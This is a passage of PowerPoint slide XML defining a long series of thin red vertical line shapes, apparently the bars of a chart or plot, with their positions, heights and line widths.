      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2692114" y="4083935"/>
            <a:ext cx="0" cy="1906398"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="962025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="961815"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711947" y="3498257"/>
            <a:ext cx="0" cy="2489014"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1256030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1255865"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711947" y="3495281"/>
            <a:ext cx="0" cy="2495305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1259205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1258867"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732177" y="4497855"/>
            <a:ext cx="0" cy="1489885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="751839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751437"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="object 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732177" y="4494881"/>
            <a:ext cx="0" cy="1496177"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="755014">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="754439"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752012" y="3531576"/>
            <a:ext cx="0" cy="2456297"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1239520">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1239050"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752012" y="3528600"/>
            <a:ext cx="0" cy="2461330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1242060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1242053"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771844" y="4425662"/>
            <a:ext cx="0" cy="1561611"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="788035">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="787868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="object 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771844" y="4422687"/>
            <a:ext cx="0" cy="1567902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="791210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="790870"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791678" y="3775922"/>
            <a:ext cx="0" cy="2212177"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1116330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1115746"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791678" y="3772947"/>
            <a:ext cx="0" cy="2217210"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1118870">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1118748"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="object 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811511" y="4625583"/>
            <a:ext cx="0" cy="1361533"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="687069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="686982"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811511" y="4622609"/>
            <a:ext cx="0" cy="1367825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="690244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="689985"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="object 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831345" y="3909202"/>
            <a:ext cx="0" cy="2078792"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1049020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1048489"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831345" y="3906227"/>
            <a:ext cx="0" cy="2083825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1051560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1051491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="object 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851178" y="4747758"/>
            <a:ext cx="0" cy="1239473"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="625475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="625329"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851178" y="4744783"/>
            <a:ext cx="0" cy="1245765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="628650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="628332"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="object 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871012" y="4025823"/>
            <a:ext cx="0" cy="1961766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="989964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="989639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871012" y="4022848"/>
            <a:ext cx="0" cy="1968057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="993139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="992641"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="object 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2890844" y="4731094"/>
            <a:ext cx="0" cy="1255832"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="633730">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="633738"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2890844" y="4728120"/>
            <a:ext cx="0" cy="1262124"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="636905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="636740"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="object 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2910679" y="4297937"/>
            <a:ext cx="0" cy="1689962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="852805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="852322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="object 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2910679" y="4294960"/>
            <a:ext cx="0" cy="1694994"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="855344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="855325"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930511" y="4958779"/>
            <a:ext cx="0" cy="1029329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="519430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="518841"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930511" y="4955805"/>
            <a:ext cx="0" cy="1034363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="521969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="521843"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950738" y="4259062"/>
            <a:ext cx="0" cy="1728971"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="872489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="871939"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="object 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950738" y="4256088"/>
            <a:ext cx="0" cy="1734004"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="875030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="874942"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="object 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970572" y="4914358"/>
            <a:ext cx="0" cy="1073371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="541655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="541258"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
